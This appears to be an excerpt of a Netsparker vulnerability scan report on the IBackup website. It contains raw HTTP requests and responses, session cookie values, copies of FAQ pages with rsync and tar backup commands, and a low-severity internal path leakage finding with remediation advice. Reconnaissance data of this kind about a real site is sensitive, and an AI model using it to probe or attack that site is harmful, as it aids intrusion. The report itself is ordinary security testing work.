<li><span class="textsmlbk">Fast wire compressed incremental transfers for optimal resource utilization</span><br />                           </li>                           <li><span class="textsmlbk">Easily scriptable and customizable</span><br />           <br />             </li> </ul></td>         <td width="50"> </td>         <td valign="top" width="305" background="../images/obk_back_tab.jpg" class="back_tab"><br /><br /><br />     <table width="86%" border="0" align="center" cellpadding="5" cellspacing="0">         <tr>         	<td colspan="2"><img src="../images/obk_rellink.jpg" alt="Related Link" width="104" height="15" border="0" /></td>        	</tr>         <tr>           <td><img src="../images/obk_spacer.gif" width="4" height="1" /></td>           <td><img src="../images/obk_spacer.gif" width="4" height="1" /></td>         </tr>         <tr>           <td align="center"><img src="../images/obk_bullet1.jpg" width="13" height="12" /></td>           <td><a href="../online-backup-faq/faqqrsync.htm" class="rel_link">FAQs</a></td>         </tr>         <tr>           <td width="12%" align="center"> </td>           <td><img src="../images/obk_spacer.gif" width="4" height="60" /></td>         </tr>         </table>     <br /></td>       </tr>     </table></td></tr></table>         <table width="900" border="0" align="center" cellpadding="0" cellspacing="0">   <tr>     <td valign="top"></td>     </tr> </table>     <table width="900" border="0" align="center" cellpadding="0" cellspacing="0">       <tr>         <td><span class="lnktxt">Backup and Restore using rsync with IBackup</span><br />           <br /> To use this utility with your IBackup account, enter your IBackup Username or email and click 'GO'. This lists the steps involved in the backup or restore process.<br />           <br />           <br />           <strong>Username or email address:</strong>           <form method='post' action='http://www.ibackup.com/qmanager/jsp/rsync_server.jsp' name="form1" onSubmit="return validate(document.form1);return false;"><input type="hidden" id="errMsg" value=""><img src="../images/obk_spacer.gif" width="4" height="5" /><br />         <table width="100%" border="0" cellspacing="0" cellpadding="0">   <tr>     <td width="34%"><table width="300" border="0" align="left" cellpadding="0" cellspacing="0" bordercolor="#F5F5F5" bgcolor="#FFFFFF">                             						                                 <tr>                                <td width="10" valign="top"><img src="../images/obk_linux_l.jpg" width="10" height="50" /> </td>                                <td background="../images/obk_linux_bg.jpg" style="background-repeat:repeat-x"><input name="user" type="text" class="formfields" size="30" /></td>                                <td width="60" background="../images/obk_linux_bg.jpg" style="background-repeat:repeat-x"><input name="image" type="image" src="../images/obk_linux_go.jpg" align="absmiddle" width="59" height="24" hspace="2" vspace="0" border="0" /><!--<a href="#"><input name="image" type="image" src="../images/obk_linux_go.jpg" align="absmiddle" width="40" height="17" hspace="2" vspace="0" border="0" /></a>--></td>                                <td width="10" align="left" valign="top"><img src="../images/obk_linux_r.jpg" width="10" height="50" /></td>                              </tr>                     </table></td>     <td width="66%"><div id="showImage" style="display:none"><img src="../images/ibk_prog.gif" width="20" height="20" align="absmiddle"></div><span id="errorInfo" class="note"></span></td>   </tr> </table>                          </form>                          </td>       </tr>       <tr><td><br /><br /><hr /><br /></td></tr>       </table>     <span id="linuxInfo">       <table width="900" border="0" align="center" cellpadding="0" cellspacing="0">       <tr>         <td><p><b>Find below an example of the steps involved in the backup or restore process. To get the exact syntax to be used for your account, enter the email id or username in the box above.</b></p></td>       </tr>       <tr>         <td><p>Install rsync, if it is not already installed on your UNIX or Linux computer from rsync's website: <a href="http://rsync.samba.org" target="_blank" class="lnktxt">http://rsync.samba.org</a><br />           <br /> To backup a directory to your IBackup account, run the following command from the shell: <br /> <br /> <span class="lnkmore">$ rsync -r -v -z -t <your_directory> <ibackup username>@rsync4.ibackup.com::ibackup</span><br /> <br /> For example, to backup the directory /home/mydata to your IBackup account with the username say john, you would run:<br /> <br /> <span class="lnkmore">$ rsync -r -v -z -t /home/mydata john@rsync4.ibackup.com::ibackup</span><br /> <br /> You are prompted to enter your IBackup password.<br /> <br /> If you do not wish to be prompted for a password, then set the following shell variable to your IBackup password and run the rsync command: <br /> <br /> <span class="lnkmore">$ export RSYNC_PASSWORD=<your ibackup password></span><br /> <br />
		 
		
		
		
			
				
					
						- /qmanager/jsp/rsyncfaq_server.jsp
						
					 
				 
			
			
			
			
			
			
				
/usr/local/mysql_sample_database /home/backup  
 
			Request 
			POST /qmanager/jsp/rsyncfaq_server.jsp HTTP/1.1 Referer: http://www.ibackup.com/online-backup-faq/faqqrsync.htm User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322) Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Host: www.ibackup.com Cookie: JSESSIONID=4CF8E543D93A429E5973A72C32256C65.tomcat9 Content-Length: 19 Accept-Encoding: gzip, deflate Connection: Keep-Alive submit=Submit&user=
			Response 
			HTTP/1.0 200 OK Date: Fri, 24 Jun 2011 01:56:12 GMT Server: Apache Set-Cookie: JSESSIONID=CA113453A6F667BAEAFBFBC6E766EE92.tomcat9; Path=/qmanager; Secure Cache-Control: no-cache Pragma: no-cache Expires: -1 Connection: close Content-Type: text/html;charset=ISO-8859-1 Result :username too short <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /> <META NAME="KEYWORDS" CONTENT="online backup data,online data backup,online server backup,online backup service,online server backups,online data backups,remote access, backup service,online file backups,online backups,remote data backups,online backup,online file backup,online backup services"> <META NAME="DESCRIPTION" CONTENT="Online Backup: Specializing in online backup services and online storage services"> <META NAME="ROBOTS" CONTENT="INDEX,FOLLOW"> <title>Online backup - Unix and Linux backups -FAQ</title> <STYLE type=text/css> BODY { 	SCROLLBAR-FACE-COLOR: #dddddd; SCROLLBAR-HIGHLIGHT-COLOR: #ffffff; SCROLLBAR-SHADOW-COLOR: #ffffff; SCROLLBAR-3DLIGHT-COLOR: #ffffff; SCROLLBAR-ARROW-COLOR: #000000; SCROLLBAR-TRACK-COLOR: #e4eff3; scrollbar-dark-shadow-color: #ffffff } </STYLE> <META content="MSHTML 6.00.2900.3268" name=GENERATOR> <link rel="stylesheet"  href="/images/ibk_style.css" type="text/css"> <script src="/images/AC_RunActiveContent.js" type="text/javascript"></script> <script src="/images/ibk_swap.js" type="text/javascript"></script> <script language="JavaScript" src="/images/mm_menu.js"></script> <script language="JavaScript" src="/images/ibpn_pmenu.js"></script> <style type="text/css"> <!-- #Layer1 { 	position:absolute; 	width:200px; 	height:115px; 	z-index:1; } .style1 {color: #CC0000} --> </style> </head> <body leftmargin="0" topmargin="0" rightmargin="0" bottommargin="0"> <TABLE WIDTH="580" BORDER="0" CELLPADDING="0" CELLSPACING="0" class="txtcontent">   <TR>     <TD valign="top"><table width="100%" border="0" cellspacing="0" cellpadding="0">       <tr>         <td width="5"> </td>         <td> </td>       </tr>       <tr>         <td> </td>         <td><img src="/images/ibl_linux_icon.jpg" alt="IBackup for Linux/Unix" width="29" height="32" align="absmiddle"> <span class="txtorange">IBackup for Linux/Unix  </span><a name="top"></a></td>       </tr>       <tr>         <td background="/images/ib_06_bg_ln.gif" class="txtcontent"> </td>         <td background="/images/ib_06_bg_ln.gif" class="txtcontent"> </td>       </tr>              <tr>         <td> </td>         <td><table width="100%" border="0" cellspacing="2" cellpadding="2">           <tr>             <td width="12"><img src="/images/ibk_next.jpg" width="22" height="16" /></td>             <td><a href="#1" class="linkbodygray">Sample script to backup a mysql database securely to an IBackup account:</a></td>           </tr>           <tr>             <td><img src="/images/ibk_next.jpg" width="22" height="16" /></td>             <td><a href="#2" class="linkbodygray">Can IBackup Professional services create custom scripts based on my needs?</a></td>           </tr>           <tr>             <td><img src="/images/ibk_next.jpg" width="22" height="16" /></td>             <td><a href="#3" class="linkbodygray">Is there a way to specify the base directory to be used on IBackup?</a> </td>           </tr>           <tr>             <td valign="top"><img src="/images/ibk_next.jpg" width="22" height="16" vspace="2" /></td>             <td><p align="justify"><a href="#4" class="linkbodygray">How do I use the Snapshots feature to restore from previously stored data file using rsync on Linux?</a></p></td>           </tr>           <tr>             <td valign="top"><img src="/images/ibk_next.jpg" width="22" height="16" vspace="2" /></td>             <td><p align="justify"><a href="#5" class="linkbodygray">When I restore data, the permissions and owner/group information differs from the source. Why?</a></p></td>           </tr>           <tr>             <td><img src="/images/ibk_next.jpg" width="22" height="16" /></td>             <td><a href="#6" class="linkbodygray">Is                there a work around to the owner/permissions issue with rsync for Linux/Unix ? </a></td>           </tr>           <tr>             <td valign="top"><img src="/images/ibk_next.jpg" width="22" height="16" vspace="2" /></td>             <td><p align="justify"><a href="#7" class="linkbodygray">Does backing up compressed files created using gzip method negate the rsync patching effect and result in full transfers each time?</a></p></td>           </tr>           <tr>             <td><img src="/images/ibk_next.jpg" width="22" height="16" /></td>             <td><a href="#8" class="linkbodygray">What are                the supported rsync options? Are there any limitations? </a></td>           </tr>           <tr>             <td><img src="/images/ibk_next.jpg" width="22" height="16" /></td>             <td><a href="#9" class="linkbodygray">How do I restore directories from my IBackup account to the local machine?</a> </td>           </tr>           <tr>             <td><img src="/images/ibk_next.jpg" width="22" height="16" /></td>             <td><a href="#r9new" class="linkbodygray">Is it advisable to backup the .htaccess file?</a></td>           </tr>         </table></td>       </tr>       <tr>         <td> </td>         <td> </td>       </tr>       <tr>         <td> </td>         <td><br>               <br>               <br>               <br>               <br>               <br>               <br>               <br>               <br>               <br>               <br>               <br>               <br></td>       </tr>       <tr>         <td class="txtcontent"> </td>         <td class="txtcontent"><b><a name="1"></a><span class="txtstrong">Sample script to backup a mysql database securely to an IBackup account:</span></b></td>       </tr>       <tr>         <td class="txtcontent"> </td>         <td class="txtcontent"><p align="justify"><br>           The following example assumes root or administrator privileges to run stunnel and that the script is readable only by the root or owner as it contains the account password information.<br>           <br>           mysqldump            sample_database > /usr/local/mysql_sample_database <br>                         <br>           stunnel            -c -d localhost:45873 -r too:5000 <br>                         <br>           export            RSYNC_PASSWORD=ibackup_account_password <br>                         <br>           rsync -r -v -z -t/usr/local/mysql_sample_database           ibackup_account_username@localhost::ibackup            --port=45873 <br>                         <br>           killall            stunnel</p></td>       </tr>       <tr>         <td align="right"> </td>         <td align="right"><a href="#top"><img src="/images/ibk_top06.gif" alt="top" width="57" height="16" border="0"></a></td>       </tr>       <tr>         <td> </td>         <td background="/images/ibk_bg_ln.gif" class="txtcontent"> </td>       </tr>       <tr>         <td class="txtcontent"> </td>         <td class="txtcontent"><b><b><a name="2"></a></b><span class="txtstrong">Can IBackup Professional Services create custom scripts based on my needs?</span></b></td>       </tr>       <tr>         <td class="txtcontent"> </td>         <td class="txtcontent"><p align="justify"><br>           Yes. IBackup Professional Services has expertise in various Unix platforms including Linux and Solaris and can create customized scripts based on your needs. We have developed many custom scripts for our enterprise customers including data center users (to execute online backup of Oracle databases including clustered environments), mysql and other setups.</p></td>       </tr>       <tr>         <td align="right"> </td>         <td align="right"><a href="#top"><img src="/images/ibk_top06.gif" alt="top" width="57" height="16" border="0"></a></td>       </tr>       <tr>         <td> </td>         <td background="/images/ibk_bg_ln.gif" class="txtcontent"> </td>       </tr>       <tr>         <td class="txtcontent"> </td>         <td class="txtcontent"><a name="3"></a><b class="txtstrong">Is there a way to specify the base directory to be used on IBackup?</b></td>       </tr>       <tr>         <td class="txtcontent"> </td>         <td class="txtcontent"><p align="justify"> <br>           If you wish to specify a base directory on your IBackup account, for example, my_ibackup_root/server1/home/backup/,<br>           <br>           you can do so by creating a folder <br>           /server1/home/backup in your IBackup account, using the browser interface.<br>           <br>           Next, backup your data using rsync as follows<br>           rsync -r -v -z -t/home/backup <br>           <ibackup username>@too::ibackup/server1/home/backup.</p></td>       </tr>       <tr>         <td align="right"> </td>         <td align="right"><a href="#top"><img src="/images/ibk_top06.gif" alt="top" width="57" height="16" border="0"></a></td>       </tr>       <tr>         <td> </td>         <td background="/images/ibk_bg_ln.gif" class="txtcontent"> </td>       </tr>       <tr>         <td align="left" class="txtcontent"> </td>         <td height="18" align="left" class="txtcontent"><p align="justify"><a name="4"></a><b class="txtstrong">How do I use the Snapshots feature to restore from a previously stored data file using rsync on Linux?</b></p></td>       </tr>       <tr>         <td align="left" class="txtcontent"> </td>         <td align="left" class="txtcontent"><p align="justify"><br>           To view previously stored data with 'Enable Snapshot view' feature for rsync on Linux and other platforms, follow the steps listed below:<br>           <br>           1.  Login via the browser and click 'Preferences' under the 'Account Maintenance' section. Select the 'Enable Snapshots view'.<br>           <br>           2. Keep your browser session open. Make a note of the directories from which you want to restore data. Then, using rsync and the directories that you have noted, apply the requisite rsync commands to restore data from Snapshots.<br>           <br>           Close the Web-Manager session when you are done with the restore.</p></td>       </tr>       <tr>         <td align="right"> </td>         <td align="right"><a href="#top"><img src="/images/ibk_top06.gif" alt="top" width="57" height="16" border="0"></a></td>       </tr>       <tr>         <td> </td>         <td background="/images/ibk_bg_ln.gif" class="txtcontent"> </td>       </tr>       <tr>         <td class="txtcontent"> </td>         <td class="txtcontent"><p align="justify"><a name="5"></a><span class="txtstrong">When I restore data, the permissions and owner/group information is different from source. Why?</b></span></p></td>       </tr>       <tr>         <td class="txtcontent"> </td>         <td class="txtcontent"><p align="justify"><br>           IBackup's rsync server stores your data with a fixed owner/group and set of permissions that may be different from original set of owner/group and permissions. After you restore the data, ensure that the permissions and ownership information is modified appropriately.<br>           <br>           For this, create and store a separate document locally that has information on the ownership and permissions information of your data.</p></td>       </tr>       <tr>         <td align="right"> </td>         <td align="right"><a href="#top"><img src="/images/ibk_top06.gif" alt="top" width="57" height="16" border="0"></a></td>       </tr>       <tr>         <td> </td>         <td background="/images/ibk_bg_ln.gif" class="txtcontent"> </td>       </tr>       <tr>         <td class="txtcontent"> </td>         <td class="txtcontent"><a name="6"></a><span class="txtstrong"><strong>I</strong><b>s            there a work around to the owner/permissions issue with rsync for Linux/Unix ?</b></span></td>       </tr>       <tr>         <td class="txtcontent"> </td>         <td class="txtcontent"><p align="justify"><br>           Yes. Use the 'tar' command to compress all the 'files to be backed up' on the server into one file and then transfer it to IBackup for backup. The single file that tar generates (called a 'tar ball') preserves all the files with their permissions. Just un-tar it again to restore.<br>           <br>           1. To backup, go to the directory containing the files and<br>           tar cvpf <tarball-filename.tar>            *<br>           (this also takes in all sub directories as well) </p>               <p>2.                  To see what is inside the tarball<br>                 tar tvf <tarball-filename.tar></p>           <p>3.              To extract the tarball<br>             tar xvpf <tarball-filename.tar></p></td>       </tr>       <tr>         <td align="right"> </td>         <td align="right"><a href="#top"><img src="/images/ibk_top06.gif" alt="top" width="57" height="16" border="0"></a></td>       </tr>       <tr>         <td> </td>         <td background="/images/ibk_bg_ln.gif" class="txtcontent"> </td>       </tr>       <tr>         <td class="txtcontent"> </td>         <td class="txtcontent"><p align="justi..
		 
		
		
		[Possible] Internal Path Leakage (Windows)
		[Possible] Internal Path Leakage (Windows)  
		
		
			
Netsparker identified an internal path in the document. 
			
Impact 
	
	 There is no direct impact however this information can help an attacker either to identify other vulnerabilities or during the exploitation of other identified vulnerabilities.
	
First ensure that this is not a false positive. Due to the nature of the issue. Netsparker could not confirm that this file path was actually the real file path of the target web server.
	
		Error messages should be disabled. 
		Remove this kind of sensitive data from the output. 
	 
External References 
	
 
		 
		
			
				
					
						- /online-backup-faq/index.html
						
					 
				 
			
			
			
			
			
			
				
C:\Users\Music with mirroring option C:\My Documents\mydata on your IBackup side  
 
			Request 
			GET /online-backup-faq/index.html HTTP/1.1 Referer: http://www.ibackup.com/forgotpass_new.htm User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322) Cache-Control: no-cache Host: www.ibackup.com Accept-Encoding: gzip, deflate
			Response 
			HTTP/1.1 200 OK Date: Fri, 24 Jun 2011 01:52:38 GMT Server: Apache Last-Modified: Thu, 26 May 2011 05:36:14 GMT ETag: "350297-26459-4ddde6ce" Accept-Ranges: bytes Content-Length: 156761 Content-Type: text/html <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <title>FAQ - IBackup For Windows</title> <link rel="stylesheet"  href="../includes/obk_style.css" type="text/css"> <script language="JavaScript" src="../includes/obk_AC_RunActiveContent.js"></script> <script language="JavaScript" src="../includes/obk_mm_menu.js"></script> <script language="JavaScript" src="../includes/obk_pmenu.js"></script> <script language="JavaScript" src="../includes/obk_dropDown.js"></script> <link rel="icon" href="/images/favicon.ico" type="image/x-icon" /> <link rel="shortcut icon" href="/images/favicon.ico" type="image/x-icon"  /> </head> <body> <script language="JavaScript1.2" type="text/javascript">mmLoadMenus();</script> <table width="100%" border="0" cellspacing="0" cellpadding="0">   <tr>     <td background="../images/obk_topbg.jpg"><table width="960"  border="0" align="center" cellpadding="0" cellspacing="0">         <tr>           <td width="160"><a href="../index.html"><img src="../images/obk_logo.jpg" alt="IBackup - online backup and online storage" width="159" height="105" border="0" /></a></td>           <td align="right" valign="top"><a  href="../feedback_new.htm"><img src="../images/obk_hd_support.jpg"  alt="Support" width="161" height="50" border="0" /></a></td>         </tr>       </table></td>   </tr> </table> <table width="100%" background="../images/obk_bacwin_bg.jpg" border="0" cellpadding="0" cellspacing="0">   <tr>     <td><img src="../images/obk_spacer.gif" width="2" height="9" /><br />       <table width="960" border="0" align="center" cellpadding="0" cellspacing="0" id="main_menu">         <tr>           <td id="mn_home"><a href="/index.html"><img src="../images/obk_spacer.gif" alt="Home" width="46" height="40" border="0" /></a></td>           <td id="mn_sign"><a href="/qmanager/jsp/regterms_new.jsp"><img src="../images/obk_spacer.gif" alt="Sign up" width="108" height="40" border="0" /></a></td>           <td id="mn_price"><a href="/charginghelp_new.htm"><img src="../images/obk_spacer.gif" alt="Pricing Plans" width="141" height="40" border="0" /></a></td>           <td id="mn_prod"><a href="#"><img src="../images/obk_spacer.gif" alt="Products" width="112" height="40" border="0"  name="products" onmouseover="MM_showMenu(window.mm_menu_0313114926_0,0,40,null,'products');" onmouseout="MM_startTimeout()" /></a></td>           <td id="mn_down"><a href="/online-backup-downloads"><img src="../images/obk_spacer.gif" alt="Downloads" width="131" height="40" border="0" /></a></td>           <td id="mn_secur"><a href="/online-backup-security"><img src="../images/obk_spacer.gif" alt="Security" width="106" height="40" border="0" /></a></td>           <td id="mn_supp"><a href="/feedback_new.htm"><img src="../images/obk_spacer.gif" alt="Support" width="109" height="40" border="0" /></a></td>           <td id="mn_part"><a href="/online-backup-partners"><img src="../images/obk_spacer.gif" alt="Partners" width="109" height="40" border="0" /></a></td>           <td id="mn_faq"><a href="/online-backup-faq"><img src="../images/obk_spacer.gif" alt="FAQs" width="98" height="40" border="0" /></a></td>         </tr>       </table>       <table width="960" border="0" align="center" cellpadding="0" cellspacing="0">         <tr>           <td background="../images/obk_banr_confirm.jpg" valign="top" class="backwin_confirm_banner"><table width="100%" border="0" cellspacing="0" cellpadding="0">               <tr>                 <td><h1>Frequently Asked Questions<a name="top" id="top"></a></h1></td>               </tr>             </table></td>         </tr>       </table></td>   </tr> </table> <table width="100%" border="0" cellpadding="0" cellspacing="0">   <tr>     <td background="../images/obk_subpag_bg.jpg" style="background-repeat:repeat-x;"><img src="../images/obk_spacer.gif" width="2" height="45" /><br />       <table width="960" border="0" align="center" cellpadding="0" cellspacing="0">         <tr>           <td valign="top" width="220"><div id="faq_list"> <span class="faq_head"><a href="index.html" class="faq_head">Online Backup</a></span>               <ul class="listbullet">                 <li><a href="index.html" class="rel_link">IBackup                    for Windows</a></li> <li><a href="faqq_ibackup_mac.htm" class="rel_link">IBackup                    for Mac </a></li>  <li><a href="ibackup-for-iphone-faq.htm" class="rel_link">IBackup                    for iPhone </a></li>                 <li><a href="faqq6n.htm" class="rel_link">Snapshots</a></li>                 <li><a href="faqqsql.htm" class="rel_link">SQL      Server Backup</a></li>                 <li><a href="faqq93a.htm" class="rel_link">Exchange                    Server Backup</a></li>                 <li><a href="faq_oracle.htm" class="rel_link">Oracle                    Server Backup</a></li>                 <li><a href="faqsharepoint.htm" class="rel_link">SharePoint Server Backup</a></li>                 <li><a href="faqqssb.htm" class="rel_link">System                    State Backup</a></li>                <li><a href="faqqrsync.htm" class="rel_link">IBackup                    for Linux<br />                   (Command Line Interface)</a></li>               </ul>               <br />               <br />               <span class="faq_head"><a href="faqq2.htm" class="faq_head">Online Storage</a></span>               <ul class="listbullet">                 <li><a href="faqq2.htm" class="rel_link">IBackup Drive</a></li>                 <li><a href="faqq8n.htm" class="rel_link">IBackup Drive                    for Mac</a></li>               </ul>               <br />               <br />               <span class="faq_head"><a href="faq_webacc.htm" class="faq_head">Web Interface</a></span><b>(Web-Manager)</b>               <ul class="listbullet">                 <li><a href="faq_webacc.htm" class="rel_link">File/Folder Management</a></li>                 <li><a href="faq_webfold.htm" class="rel_link">WebFolders</a></li>                 <li><a href="faq_share.htm" class="rel_link">Share</a></li>                 <li><a href="faq_subac.htm" class="rel_link">Sub-Accounts</a></li>                 <li><a href="faq_acct.htm" class="rel_link">Account Maintenance</a></li>                 <li><a href="faq_report.htm" class="rel_link">Reports</a></li>                 <li><a href="faq_managebkpset.htm" class="rel_link">Web Based Backup<br /> Management</a></li>               </ul>               <br />               <a href="faqq_vista.htm" class="faq_head"><br /> Guideline FAQs</a>               <ul class="listbullet">                 <li><a href="faqq_vista.htm" class="rel_link">Windows 7 and Vista</a></li>               </ul>               <br />               <br />               <span class="faq_head"><a href="fwl_ibwin.htm" class="faq_head">Firewall Guidance</a></span>               <ul class="listbullet">                 <li><a href="fwl_ibwin.htm" class="rel_link">IBackup                    for Windows</a></li>                 <li><a href="fwl_ibmac.htm" class="rel_link">IBackup                    for Mac</a></li>                 <li><a href="fwl_ibdrive.htm" class="rel_link">IBackup Drive</a></li>               </ul>               <br />               <br />                <span class="faq_head"><a href="faqq94.htm" class="faq_head">Security</a></span>  <ul class="listbullet">                 <li><a href="faqq94.htm" class="rel_link">Security                    and Encryption</a></li>               </ul><br /> <br /> <span class="faq_head"><a href="faqq96.htm" class="faq_head">Plans</a></span>               <ul class="listbullet">                 <li><a href="faqq96.htm" class="rel_link">Subscription                    Plans</a></li>                 <li><a href="faqq1.htm" class="rel_link">How                    do I decide which IBackup feature to use with my IBackup account?</a></li>                 <li><a href="faqq92.htm" class="rel_link">Free                    Trial</a></li>                 <li><a href="faqq97.htm" class="rel_link">Credit                    card Issues</a><br /> <br /></ul> <span class="faq_head"><a href="faqq98.htm" class="faq_head">Miscellaneous</a></span></span><br />   <br /> <br />           </div></td>           <td width="25" class="faq_split"> </td>           <td width="660" valign="top" class="txtcontent"><table WIDTH="100%" border="0" cellspacing="0" cellpadding="0">               <tr>                 <td width="5"> </td>                 <td><span class="lnkmore">IBackup For Windows</span>                   <hr />                   <br />                   <table width="100%" border="0" cellspacing="2" cellpadding="4">                     <tr>                       <td colspan="2"><span class="lnktxt">General</span><a name="gen"></a></td>                     </tr>                     <tr>                       <td width="12"><img src="../images/obk_bullet1.gif" width="13" height="12" /></td>                       <td width="530"><a href="#1" class="linkbodygray">What is IBackup for Windows?</a></td>                     </tr>                     <tr>                       <td><img src="../images/obk_bullet1.gif" width="13" height="12" /></td>                       <td><a href="#2" class="linkbodygray">Does IBackup for Windows use Delta Blocking technology?</a></td>                     </tr>                     <tr>                       <td valign="top"><img src="../images/obk_bullet1.gif" width="13" height="12" /></td>                       <td><a href="#3" class="linkbodygray">Does IBackup for Windows support my native character set?</a></td>                     </tr>                     <tr>                       <td valign="top"><img src="../images/obk_bullet1.gif" width="13" height="12" /></td>                       <td><a href="#7" class="linkbodygray">What is the ideal solution for online backup of several hundred gigabytes of data?</a></td>                     </tr>                     <tr>                       <td valign="top"><img src="../images/obk_bullet1.gif" width="13" height="12" vspace="3" /></td>                       <td><div align="justify"><a href="#8" class="linkbodygray">My initial backup was done via a shipped hard disk. But when I backup my data using the application, it seems to be backing up my files and folders all over again. Why?</a></div></td>                     </tr>                     <tr>                       <td><img src="../images/obk_bullet1.gif" width="13" height="12" /></td>                       <td><a href="#dtedisp" class="linkbodygray">How are the dates of backed up files displayed                          in IBackup for Windows? </a></td>                     </tr>                     <tr>                       <td><img src="../images/obk_bullet1.gif" width="13" height="12" /></td>                       <td><a href="#qcbook" class="linkbodygray">How do I                          use IBackup to schedule backups for Quickbooks data? </a></td>                     </tr>                     <tr>                       <td> </td>                       <td> </td>                     </tr>                   </table>                   <table width="100%" border="0" cellspacing="2" cellpadding="4">                     <tr>                       <td colspan="2"><span class="lnktxt">Quota</span><a name="quo"></a></td>                     </tr>                     <tr>                       <td width="12"><img src="../images/obk_bullet1.gif" width="13" height="12" /></td>                       <td><a href="#4" class="linkbodygray">If I keep on performing backups, will I use up my quota quickly? </a></td>                     </tr>                     <tr>                       <td><img src="../images/obk_bullet1.gif" width="13" height="12" /></td>                       <td><a href="#5" class="linkbodygray">I received a quota overuse email. What should I do? </a></td>                     </tr>                     <tr>                       <td valign="top"><img src="../images/obk_bullet1.gif" width="13" height="12" vspace="3" /></td>                       <td><div align="justify"><a href="#6" class="linkbodygray">I have deleted some unwanted files/folders from my IBackup account. However, the 'Quota used' does not change. How do I know the exact quota used?</a></div></td>                     </tr>                   </table>                   <table width="100%" border="0" cellspacing="2" cellpadding="4">                     <tr>         ..
		 
		
		
		
			
			
			
			
			
			
				
C:\Users\Music with mirroring option C:\My Documents\mydata on your IBackup side  
 
			Request 
			GET /online-backup-faq/ HTTP/1.1 Referer: http://www.ibackup.com/online-backup-faq/index.html User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322) Cache-Control: no-cache Host: www.ibackup.com Accept-Encoding: gzip, deflate
			Response 
			HTTP/1.1 200 OK Date: Fri, 24 Jun 2011 01:52:38 GMT Server: Apache Last-Modified: Thu, 26 May 2011 05:36:14 GMT ETag: "350297-26459-4ddde6ce" Accept-Ranges: bytes Content-Length: 156761 Content-Type: text/html <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <title>FAQ - IBackup For Windows</title> <link rel="stylesheet"  href="../includes/obk_style.css" type="text/css"> <script language="JavaScript" src="../includes/obk_AC_RunActiveContent.js"></script> <script language="JavaScript" src="../includes/obk_mm_menu.js"></script> <script language="JavaScript" src="../includes/obk_pmenu.js"></script> <script language="JavaScript" src="../includes/obk_dropDown.js"></script> <link rel="icon" href="/images/favicon.ico" type="image/x-icon" /> <link rel="shortcut icon" href="/images/favicon.ico" type="image/x-icon"  /> </head> <body> <script language="JavaScript1.2" type="text/javascript">mmLoadMenus();</script> <table width="100%" border="0" cellspacing="0" cellpadding="0">   <tr>     <td background="../images/obk_topbg.jpg"><table width="960"  border="0" align="center" cellpadding="0" cellspacing="0">         <tr>           <td width="160"><a href="../index.html"><img src="../images/obk_logo.jpg" alt="IBackup - online backup and online storage" width="159" height="105" border="0" /></a></td>           <td align="right" valign="top"><a  href="../feedback_new.htm"><img src="../images/obk_hd_support.jpg"  alt="Support" width="161" height="50" border="0" /></a></td>         </tr>       </table></td>   </tr> </table> <table width="100%" background="../images/obk_bacwin_bg.jpg" border="0" cellpadding="0" cellspacing="0">   <tr>     <td><img src="../images/obk_spacer.gif" width="2" height="9" /><br />       <table width="960" border="0" align="center" cellpadding="0" cellspacing="0" id="main_menu">         <tr>           <td id="mn_home"><a href="/index.html"><img src="../images/obk_spacer.gif" alt="Home" width="46" height="40" border="0" /></a></td>           <td id="mn_sign"><a href="/qmanager/jsp/regterms_new.jsp"><img src="../images/obk_spacer.gif" alt="Sign up" width="108" height="40" border="0" /></a></td>           <td id="mn_price"><a href="/charginghelp_new.htm"><img src="../images/obk_spacer.gif" alt="Pricing Plans" width="141" height="40" border="0" /></a></td>           <td id="mn_prod"><a href="#"><img src="../images/obk_spacer.gif" alt="Products" width="112" height="40" border="0"  name="products" onmouseover="MM_showMenu(window.mm_menu_0313114926_0,0,40,null,'products');" onmouseout="MM_startTimeout()" /></a></td>           <td id="mn_down"><a href="/online-backup-downloads"><img src="../images/obk_spacer.gif" alt="Downloads" width="131" height="40" border="0" /></a></td>           <td id="mn_secur"><a href="/online-backup-security"><img src="../images/obk_spacer.gif" alt="Security" width="106" height="40" border="0" /></a></td>           <td id="mn_supp"><a href="/feedback_new.htm"><img src="../images/obk_spacer.gif" alt="Support" width="109" height="40" border="0" /></a></td>           <td id="mn_part"><a href="/online-backup-partners"><img src="../images/obk_spacer.gif" alt="Partners" width="109" height="40" border="0" /></a></td>           <td id="mn_faq"><a href="/online-backup-faq"><img src="../images/obk_spacer.gif" alt="FAQs" width="98" height="40" border="0" /></a></td>         </tr>       </table>       <table width="960" border="0" align="center" cellpadding="0" cellspacing="0">         <tr>           <td background="../images/obk_banr_confirm.jpg" valign="top" class="backwin_confirm_banner"><table width="100%" border="0" cellspacing="0" cellpadding="0">               <tr>                 <td><h1>Frequently Asked Questions<a name="top" id="top"></a></h1></td>               </tr>             </table></td>         </tr>       </table></td>   </tr> </table> <table width="100%" border="0" cellpadding="0" cellspacing="0">   <tr>     <td background="../images/obk_subpag_bg.jpg" style="background-repeat:repeat-x;"><img src="../images/obk_spacer.gif" width="2" height="45" /><br />       <table width="960" border="0" align="center" cellpadding="0" cellspacing="0">         <tr>           <td valign="top" width="220"><div id="faq_list"> <span class="faq_head"><a href="index.html" class="faq_head">Online Backup</a></span>               <ul class="listbullet">                 <li><a href="index.html" class="rel_link">IBackup                    for Windows</a></li> <li><a href="faqq_ibackup_mac.htm" class="rel_link">IBackup                    for Mac </a></li>  <li><a href="ibackup-for-iphone-faq.htm" class="rel_link">IBackup                    for iPhone </a></li>                 <li><a href="faqq6n.htm" class="rel_link">Snapshots</a></li>                 <li><a href="faqqsql.htm" class="rel_link">SQL      Server Backup</a></li>                 <li><a href="faqq93a.htm" 